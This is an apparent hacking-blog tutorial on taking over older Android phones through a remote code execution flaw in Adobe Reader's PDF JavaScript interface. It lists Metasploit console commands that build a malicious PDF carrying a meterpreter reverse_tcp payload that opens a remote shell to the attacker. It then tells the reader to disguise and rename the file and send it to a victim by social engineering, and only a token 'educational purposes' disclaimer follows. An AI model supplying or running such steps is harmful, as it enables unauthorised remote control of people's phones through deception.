How To Hack Android With PDF File ?

Hack Android With PDF

hack android with PDF file Please note that this is an old vulnerability that has been fixed and does not work on newer phones. But older phones are still vulnerable to this attack.

This tip works with Adobe Reader 11.2.0 and below on Android devices. This is a remote code execution vulnerability in Adobe Reader that could help us gain control of an Android device via a malicious PDF generated with Metasploit.

Adobe Reader Android version prior to 11.2.0 has a critical vulnerability that makes unprotected native interfaces unprotected to untrusted JavaScript inside a PDF file.

This hacker works by embedding an exploit from the android / webview_addjavascriptinterface browser exploit that we used in the previous article. This hack uses PDF as media to get command shell on Android devices with a vulnerable version of Adobe Reader.

Simply put, we are exploiting a vulnerability in Adobe Reader to exploit and hack an Android device, as well as run malicious Javascript code through the Adobe Reader interface.

Steps To Hack Android With PDF

Follow The Steps Below To Hack Android With PDF.

Step – 1

Start your Kali Linux computer and open the Metasploit console to start jailbreaking Android with a pdf file.

Step – 2

To generate a malicious PDF file, enter the following commands in the MSF console:

use exploit/android/fileformat/adobe_reader_pdf_js_interface
set payload android/meterpreter/reverse_tcp
set lhost 192.168.192.166 (Your IP here)
set port 20068
exploit

Step – 3

Now that the malicious PDF is ready. Use social engineering to send a malicious PDF to the victim.

You can use any PDF editor to edit the file and add content to make it look more realistic.

The folder path

/root/.msf4/local/eninja.pdf

Step – 4

In my case, this is a pdf file eninja.pdf, but you can always change the name to whatever the victim will click on.

Note – This attack only works on limited Android devices with vulnerable webview API and older versions of Adobe Reader.

As soon as the victim opens the malicious PDF, the Android phone will be jailbroken and we can access the shell on our Kali machine and you can control it remotely using the meterpreter shell. This is how easy it is to hack an Android device with a pdf file.


Warning ! ! !
All The Information Provided Here Is For Educational Purposes Only.
You Are Solely Responsible For What You Do With This Information.

Download As PDF

Print This Page


Join Us On Telegram
Join Us On Telegram